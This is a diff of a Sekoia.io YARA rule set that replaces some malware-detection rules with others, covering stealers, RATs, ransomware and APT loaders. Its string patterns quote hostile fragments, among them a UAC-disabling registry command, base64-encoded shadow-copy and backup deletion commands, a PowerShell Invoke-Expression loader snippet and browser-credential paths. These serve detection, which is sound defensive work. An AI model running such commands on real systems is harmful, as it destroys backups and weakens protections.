+rule SEKOIA_Apt_Uta0178_Javascript_Inclusion_Strings
 {
 	meta:
-		description = "Detect RATel based on characteristic strings"
+		description = "Detects UTA0178 malicious inclusion strings"
 		author = "Sekoia.io"
-		id = "d0c8b89b-c811-47aa-9e03-717998c40d91"
-		date = "2023-04-24"
+		id = "af816c35-1f00-47ea-86ee-c034607c625e"
+		date = "2024-01-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_ratel_strings.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uta0178_javascript_inclusion_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ff5640b03ec3e535cdb86c2a0feb52d0c472928ff88a36ec9f66ac8aa07c9f69"
+		logic_hash = "d3fedf49417178df374d6ae20e57ffcfa00cb68a647769964c049d9a8e0f4958"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[-] Error when changing folder." ascii
-		$s2 = "cmd.exe" wide
-		$s3 = "back slash find: " ascii
-		$s4 = "MOD_ALL:" wide
-		$s5 = "MOD_PERSISTENCE" wide
-		$s6 = "MOD_DESTRUCTION:" wide
-		$s7 = "MOD_RECONNECT" wide
-		$s8 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s9 = "powershell.exe -command \"([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')\"" wide
-		$s10 = "The command was executed successfully but no data was returned."
-		$s11 = "[-] TIMEOUT IN CREATEPROCESS, but all the processes in the name of: " ascii
-		$s12 = "we were well and truly killed." ascii
+		$s0 = ".value"
+		$s1 = "btoa("
+		$s2 = "https://"
+		$s3 = "new XMLHttpRequest();"
+		$s4 = ".send(null);"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and filesize < 3MB and 8 of them
+		@s0< @s1 and @s1 < @s2 and @s2 < @s3 and @s3 < @s4 and @s4- @s0 < 350
 }
-rule SEKOIA_Rat_Win_Remcos : FILE
+rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
 {
 	meta:
-		description = "DEPRECATED : Find Remcos RAT samples based on specific strings"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "011132f5-c5d9-4e97-bfed-0b94c9a30481"
-		date = "2023-01-29"
+		id = "6fe37d52-9bd3-4aa8-83ba-15399bd1b66c"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_remcos.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_powershell_infection_chain_2.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "259f31d745449dc81cde698bb0ae4a20b4bbf050a1c818fbb5a891f26ca2e856"
+		logic_hash = "029d88971030a377b3c93ba4c986668e53b01ee03ba94a0a4ceb54b20b72ff2d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-01-08"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" ascii
-		$str02 = "Disconnection occurred, retrying to connect..." ascii
-		$str03 = "[Following text has been pasted from clipboard:]" ascii
-		$str04 = "[Following text has been copied to clipboard:]" ascii
-		$str05 = "[Chrome StoredLogins found, cleared!]" ascii
-		$str06 = "PING 127.0.0.1 -n 2" ascii
-		$str07 = "Remcos_Mutex_Inj" ascii
-		$str08 = " * REMCOS v" ascii
-		$str09 = "Connected to C&C!" ascii
-		$str10 = "[Cleared all cookies & stored logins!]" ascii
+		$ = "files.catbox.moe"
+		$ = "$pse = $pse.Replace"
+		$ = "start -WindowStyle Hidden -FilePath $p"
+		$ = "-bxor $xorMask"
+		$ = "SysctlHost"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		4 of them and filesize < 100KB
 }
-
-rule SEKOIA_Backdoor_Win_Nukesped_Andariel
+rule SEKOIA_Trojan_Android_Xenomorph : FILE
 {
 	meta:
-		description = "Detect the NukeSped variant type 1 used by Andariel in October 2023"
+		description = "Detect samples of the Android banking trojan Xenomorph"
 		author = "Sekoia.io"
-		id = "a3601f0b-5782-4546-ac22-8a0514791f8f"
-		date = "2023-11-27"
+		id = "ec65ca1b-e71f-4772-8be0-2a2b6a690987"
+		date = "2022-02-25"
 		modified = "2024-12-19"
-		reference = "https://asec.ahnlab.com/en/59073/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_nukesped_andariel.yar#L4-L19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_xenomorph.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d6421f3d0a3059e4104cfdceebb237269592f8ace7cc8d5bd613d239e4c010f4"
+		logic_hash = "d44e5742449cd9c19b50ab23f452378d5627e19140554d12086994d820df9c64"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ass0 = "assets/shadows/knife_shadow_"
+		$ass1 = "assets/knife_"
+		$ass2 = "okhttp3"
+
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "4ce43c7e358e3951f4c4ebd050d570786cbb473ee353974fc7414e3d753da9f6" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "355485cbe2bec406d60a48d7d8d25c71d9ded3c508c87273d936a92b94720d9b" )
+		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and #ass0 > 10 and #ass1 > 10 and $ass2
 }
-rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
+rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
 {
 	meta:
-		description = "Detects stealer module of XDealer"
+		description = "Detect the Squirrelwaffle DLL"
 		author = "Sekoia.io"
-		id = "6314cf6c-2c3b-4e9a-87a1-b56ee148474c"
-		date = "2024-03-22"
+		id = "bea3125e-6e84-435f-855b-fd3239a0deac"
+		date = "2021-09-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_stealer_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_squirrelwaffle.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "79ba2fd14cd2eb73848026f79ce6115df813e0fda3a071ab26659874e04e2201"
+		logic_hash = "ab1a95f09564d0417d5c06c578d4dc8d790ec09bc67716d8c9e5207262a0594d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255550,63 +255662,89 @@ rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%sbmp.tmp"
-		$ = "%sjgp.tmp"
-		$ = "%sma_%s_%05u_%u."
-		$ = "%s%s_%05u_%u."
+		$s1 = "AEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" ascii
+		$s2 = "c:\\equal\\True\\bird_Select\\780\\true.pdb" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
+rule SEKOIA_Apt_Globalshadow : FILE
+{
+	meta:
+		description = "Detects the GLOBALSHADOW malware"
+		author = "Sekoia.io"
+		id = "2fef6192-25a6-4d6a-8e19-53ad51617d90"
+		date = "2024-09-04"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_globalshadow.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		hash = "68c16b6f178c88c12c9555169887c321"
+		logic_hash = "034a994be5d5b00fc7d1a43a0cb0b5b576358cea26f3354fd574132560ca0ae3"
+		score = 75
+		quality = 30
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
 
-rule SEKOIA_Backdoor_Win_Ketrum2
+	strings:
+		$command1 = "time to rest" wide
+		$command2 = "pw" wide
+		$command3 = "pr" wide
+		$command4 = "dnld" wide
+		$step1 = "step1-" wide
+		$step2 = "step2-" wide
+		$step3 = "step3-" wide
+		$step4 = "step4-" wide
+		$step5 = "step5-" wide
+		$step6 = "step6-" wide
+		$delim = "]#@#[" wide
+
+	condition:
+		uint16be( 0 ) == 0x4d5a and 2 of ( $command* ) and 3 of ( $step* ) and $delim and true
+}
+rule SEKOIA_Apt_Kimsuky_Powershell : FILE
 {
 	meta:
-		description = "Detect Ke3chang's Ketrum backdoor version 2"
+		description = "Powershell scripts used by Kimsuky. If size < 3KB ok. If between 3 and 15, a check is needed"
 		author = "Sekoia.io"
-		id = "afcc349a-d44b-4b66-b86f-c62e700fa899"
-		date = "2022-10-19"
+		id = "b7f812e0-d08b-40fe-908a-dc5765d6bc66"
+		date = "2024-09-23"
 		modified = "2024-12-19"
-		reference = "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_ketrum2.yar#L4-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_powershell.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5317b133337ad333c97bbfa6c9d62aea5fd81f3b570f1d6b1ac93ea82062ef61"
+		hash = "6babb53d881448dc58dd7c32fcd4208a"
+		hash = "29ec7a4495ea512d44d33c9847893200"
+		hash = "fde68771cebd7ecd81721b0dff5b7869"
+		hash = "0c3fd7f45688d5ddb9f0107877ce2fbd"
+		hash = "1a1723be720c1d9cd57cf4a6a112df79"
+		logic_hash = "7436d8cba8a8caaf95786c38c4ceee4426dc7e36ae3eeed5d3162310cd76091d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "271384a078f2a2f58e14d7703febae8a28c6e2d7ddb00a3c8d3eead4ea87a0c0"
-		hash2 = "aa467945dd7b9b095e592fc96384bb385f2c95d00d5424e42bb6ab09827cb0ce"
-		hash3 = "aacaf0d4729dd6fda2e452be763d209f92d107ecf24d8a341947c545de9b7311"
-		hash4 = "ac5cb6e17f094068686225075251153e3eb21dc2d1ae744a97ab113cab034a36"
 
 	strings:
-		$ = "powershell.exe" wide
-		$ = "cmd.exe" wide
-		$ = "%s\\adult.sft" wide
-		$ = "%s\\Notice" wide
-		$ = "%s\\Message" wide
-		$ = "\\Microsoft\\Media Player" wide
-		$ = "Windows\\CurrentVersion\\Explorer\\Shell Folders" wide ascii
-		$ = "Windows\\CurrentVersion\\Internet Settings" wide ascii
+		$ = ".ToCharArray();[array]::Reverse(" ascii
+		$ = ");$res = -join ($bytes -as [char[]]);Invoke-Expression $res;" ascii
 
 	condition:
-		all of them and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "49a60be4b95b6d30da355a0c124af82b35000bce8f24f957d1c09ead47544a1e" )
+		all of them and filesize < 15KB
 }
-
-rule SEKOIA_Wiper_Win_Dnwipe : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Variant : FILE
 {
 	meta:
-		description = "Detect the dnWipe malware"
+		description = "Detects PowerShower"
 		author = "Sekoia.io"
-		id = "522fdaa5-8fe6-4e37-aaf8-13e3a7787d21"
-		date = "2022-11-21"
+		id = "416d0cb0-bc59-47ae-8a98-d7b39f8108ab"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_dnwipe.yar#L4-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_variant.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "634ca80a168c9d98ce87a3a1a451769bddb7ae27e28b3682693b34ccce2c7ad4"
+		logic_hash = "7bcfafd5a52d685fe33715c8c3725d95947c65863902fde05cf85685a6bfeab8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255614,25 +255752,24 @@ rule SEKOIA_Wiper_Win_Dnwipe : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dnWIPE"
-		$ = "dnWIPE" wide
-		$ = "C:\\Users\\Admin1\\source\\repos\\dnWIPE\\dnWIPE\\obj\\Debug\\dnWIPE.pdb"
+		$s1 = "[System.Text.Encoding]::" ascii wide
+		$s2 = "{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 50KB or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "93290ef6447b0a16b92e50a1652ac3eb8f1237cc5f8005e080750fb58c19d230" )
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Malware_Venom_Admin_Strings : FILE
+rule SEKOIA_Apt_Turla_Comlook : FILE
 {
 	meta:
-		description = "Detects Venom admin strings"
+		description = "Detects Class and Method names used inside ComLook"
 		author = "Sekoia.io"
-		id = "4929340c-310b-4c59-a111-23409f973d22"
-		date = "2022-08-29"
+		id = "c3bf886b-f952-47f9-aff6-3cd74c27077d"
+		date = "2023-10-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_venom_admin_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_turla_comlook.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "205f16b07f58290b2898de7a7dd1e20f3d7651d738f0b15bf810f9be66eedf3d"
+		logic_hash = "882a2efda4c3888c34a2802797c9eac4ab8b96774f2eea19e586ff9c8adb9292"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255640,30 +255777,36 @@ rule SEKOIA_Malware_Venom_Admin_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/admin/admin.go"
-		$ = "/cli/interactive.go"
-		$ = "/cli/cli.go"
-		$ = "/dispather/sender.go"
-		$ = "/dispather/proxy.go"
-		$ = "/dispather/handler.go"
-		$ = "/dispather/forward.go"
-		$ = "/utils/reuse_port.go"
+		$ClassName1 = "AgentConfig"
+		$ClassName2 = "CommandPerforming"
+		$MethodName1 = "CmdCommand"
+		$MethodName2 = "GetConfigCommand"
+		$MethodName3 = "GetFileCommand"
+		$MethodName4 = "PutFileCommand"
+		$MethodName5 = "SetConfigCommand"
+		$MethodName6 = "AgentProtocol"
+		$Log1 = "CONFIG_SERVERS_LIST_PARSING_ERROR" ascii wide
+		$Log2 = "GET_UIDS_TO_CHECK_PARSING_ERROR" ascii wide
+		$Log3 = "PAYLOAD_PARSING_FILEPATH_AND_FILE_ERROR" ascii wide
+		$Log4 = "COMMAND_EMPTY_ERROR" ascii wide
+		$Log5 = "IMAP_USERNAME_FORMAT_INCORRECT" ascii wide
+		$Log6 = "NO_MESSAGES_TO_RETRIEVE" ascii wide
 
 	condition:
-		filesize < 11MB and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of ( $ClassName* ) and any of ( $MethodName* ) and any of ( $Log* )
 }
-rule SEKOIA_Backdoor_Blueshell : FILE
+rule SEKOIA_Stealer_Win_Demotryspy : FILE
 {
 	meta:
-		description = "Detects BlueShell backdoor"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "8f1cd966-c4d8-44f9-8cd5-4f5277332546"
-		date = "2023-09-08"
+		id = "70af0e40-b177-49a3-bff4-723f3f4aa375"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_blueshell.yar#L1-L23"
+		reference = "https://paper.seebug.org/3115/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_demotryspy.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "348ae383f2aaef544951641dd7e2879afa23e37bdf429c6255254115bd3e10d5"
+		logic_hash = "b7a910e4d394d2122e6b4fe76daa6691a642396e27f7a47d09232f4b7eb424ee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255671,59 +255814,65 @@ rule SEKOIA_Backdoor_Blueshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "BlueShell" ascii
-		$s2 = "client.go" ascii
-		$s3 = "server ip" ascii
-		$s4 = "server port" ascii
-		$s5 = "reconnect wait time" ascii
-		$s6 = "shell" ascii
-		$s7 = "socks" ascii
-		$s8 = "socks5" ascii
-		$s9 = "GetInteractiveShell" ascii
+		$demotry1 = "DemoTry.exe"
+		$demotry2 = "DemoTry\\Release\\DemoTry.pdb"
+		$wide1 = "\\loc.tmp" wide
+		$wide2 = "\\log.tmp" wide
+		$wide3 = "\\Google\\Chrome\\User Data" wide
+		$wide4 = "\\Default\\Login data" wide
+		$wide5 = "\\Local State" wide
 
 	condition:
-		filesize < 11MB and all of them
+		uint16be( 0 ) == 0x4d5a and ( 1 of ( $demotry* ) or all of ( $wide* ) )
 }
-rule SEKOIA_Malicious_Lnk_Exploiting_Webdav_Share_Generic : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Stealer_Module : FILE
 {
 	meta:
-		description = "Detects some malicious LNK"
+		description = "Find stealer module of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "b228643c-ab23-46e1-b170-3da6bcb2dd23"
-		date = "2024-11-22"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f02"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malicious_lnk_exploiting_webdav_share_generic.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_stealer_module.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "cffb40e13e3aa6761330090b42314c36"
-		logic_hash = "8179ef8ac43cb67a1b70baf7824452834f498d988df84e138c857ac0ef164b4b"
+		hash = "4d2fb518c9e23c5c70e70095ba3b63580cafc4b03f7e6dce2931c54895f13b2c"
+		logic_hash = "0a6615d65867a160e1c87fbcfe30090d44d7f5c25b3a904f8719be7b385b14bb"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "powershell.exe" wide
-		$ = "-Name explorer; \\\\" wide
-		$ = "@80\\"
-		$ = "desktop-tcrdu4c"
+		$eni01 = "enigma.common" nocase ascii wide
+		$eni02 = "--ENIGMA STEALER--" wide
+		$str01 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide
+		$str02 = "/C chcp 65001 && netsh wlan show profile | findstr All" wide
+		$str03 = "/C chcp 65001 && netsh wlan show networks mode=bssid" wide
+		$str04 = "[Open google maps]" wide
+		$str05 = "Stealerium.Target." ascii
+		$str06 = "--- ClipperBCH ---" wide
+		$str07 = "//setting[@name='Username']/value" wide
+		$str08 = "Stealer >> Failed recursive remove directory with passwords" wide
+		$str09 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" wide
+		$str10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and 2 of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $eni* ) and 4 of ( $str* )
 }
-rule SEKOIA_Ransomware_Win_Redeemer : FILE
+rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
 {
 	meta:
-		description = "Finds Redeemer samples based on characteristic strings"
+		description = "Detects xored DLL from MustangPanda embedding a document"
 		author = "Sekoia.io"
-		id = "ef94c1b0-d292-4fae-9801-4860e7347745"
-		date = "2022-12-09"
+		id = "73d13624-01df-41ab-b449-86db43dc6c55"
+		date = "2022-07-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_redeemer.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_xoreddll.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c1798a18e763277d19a3b698459244a2bc2eeebbbf239db7540d1493955ce5f0"
+		logic_hash = "685be191cf187c0d5bfd00354400c47a961c9d047aa7e65e4cfc2201ec5eb1bc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255731,58 +255880,67 @@ rule SEKOIA_Ransomware_Win_Redeemer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "RedeemerMutex" ascii
-		$str1 = "SOFTWARE\\Redeemer" ascii
-		$str2 = "-----BEGIN REDEEMER PUBLIC KEY-----" ascii
-		$str3 = "dnNzYWRtaW4gZGVsZXRlIHNoYWRvd3MgL0FsbCAvUXVpZXQ=" ascii
-		$str4 = "d2V2dHV0aWwgY2xlYXItbG9nIEFwcGxpY2F0aW9u" ascii
-		$str5 = "d2JhZG1pbiBkZWxldGUgc3lzdGVtc3RhdGViYWNrdXAgLWRlbGV0ZW9sZGVzdCAtcXVpZXQ=" ascii
-		$str6 = "YXNzb2MgLnJlZGVlbT1yZWRlZW1lcg==" ascii
-		$str7 = "UmVkZWVtZXIgUmFuc29td2FyZSAtIFlvdXIgRGF0YSBJcyBFbmNyeXB0ZWQ=" ascii
-		$str8 = "redeemer\\DefaultIcon" wide
-		$str9 = "\\Redeemer.sys" wide
+		$clear = "This program cannot be run in DOS mode"
+		$stub = "This program cannot be run in DOS mode" xor
+		$res1 = "5w>w9wR'31Z" xor
+		$res2 = "r0y0~0KlBD" xor
+		$res3 = "d&o&h&öé7Æ" xor
+		$res4 = "9{2{5{+0" xor
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		$stub and any of ( $res* ) and not $clear and filesize < 3MB
 }
-rule SEKOIA_Loader_Win_Piccassoloader : CVE_2023_38831
+rule SEKOIA_Downloader_Mac_Rustbucket : FILE
 {
 	meta:
-		description = "Detect the variant of Picasso used by GhostWriter as CVE-2023-38831 exploitation payload"
+		description = "RustBucket fake PDF reader"
 		author = "Sekoia.io"
-		id = "91d9c2de-451e-467e-8f5c-38bbcce92b72"
-		date = "2023-09-07"
+		id = "5a003b68-ad9a-47f9-b157-dd898181dac2"
+		date = "2023-04-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_piccassoloader.yar#L1-L16"
+		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_rustbucket.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "93e598f6c70dcb1ddf20ea926af72241e135bdf910f3721a7a0c3036f6a3d1b9"
+		logic_hash = "1b9e9a3f4fb4804eb94ab8d3573781d67f96d180b258cfc10be384eec44509ed"
 		score = 75
-		quality = 76
-		tags = "CVE-2023-38831"
+		quality = 78
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880"
+		hash2 = "bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49"
+		hash3 = "7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407"
+		hash4 = "e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c"
 
 	strings:
-		$ = {2c 27 44 65 63 72 79 70 74 6f 72 27 2c 27 6e 6f 64 65 27 2c 27 55 73 65 72 2d}
-		$ = {5c 78 32 30 43 68 72 6f 6d 65 2f 31 30 27 2c 27 67 67 65 72 27 2c 27 73 65 64 43 69 70 68 65 72 27 2c 27 5f 61 70 70 65 6e 64 27 2c 27 5f 45 4e 43 5f 58 46 4f 52 4d 27 2c 27 57 53 63 72 69 70 74 2e 53 68 27}
+		$down_exec1 = "_down_update_run" nocase
+		$down_exec2 = "downAndExec" nocase
+		$encrypt1 = "_encrypt_pdf"
+		$encrypt2 = "_encrypt_data"
+		$error_msg1 = "_alertErr"
+		$error_msg2 = "_show_error_msg"
+		$view_pdf1 = "-[PEPWindow view_pdf:]"
+		$view_pdf2 = "-[PEPWindow viewPDF:]"
+		$macho_magic = {CF FA ED FE}
+		$java_magic = {CA FE BA BE}
 
 	condition:
-		1 of them
+		($macho_magic at 0 or $java_magic at 0 ) and 5 of them and filesize > 50KB
 }
-
-rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_2024 : FILE
 {
 	meta:
-		description = "Detects vineloader"
+		description = "Detects HTML Smuggling webpages of Gamaredon used in 2024"
 		author = "Sekoia.io"
-		id = "7a599076-cd9d-42c4-a83a-9a991ede19fb"
-		date = "2024-02-29"
+		id = "8fa1f80b-2261-4d63-92d8-7c360be73fe2"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_spikedwine_wineloader.yar#L3-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_2024.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c71d7ef8cb89d8fcd42e3178a729d912d5fe8e9eb396e46d7a0f5176a9398d75"
+		hash = "ab2807824e68d5efb4c896e1af82e693"
+		hash = "926b7e65d0d61cd6ba9e085193ae8b1d"
+		logic_hash = "9cd82f497fd7b82f02fec4ce1d131cd2685861c7c02aaae992e07a7d8bd30595"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255790,54 +255948,58 @@ rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$c = { E8 ?? ?? ?? ?? 48 8D 0D
-        ?? ?? ?? ?? 48 8D 05 ??
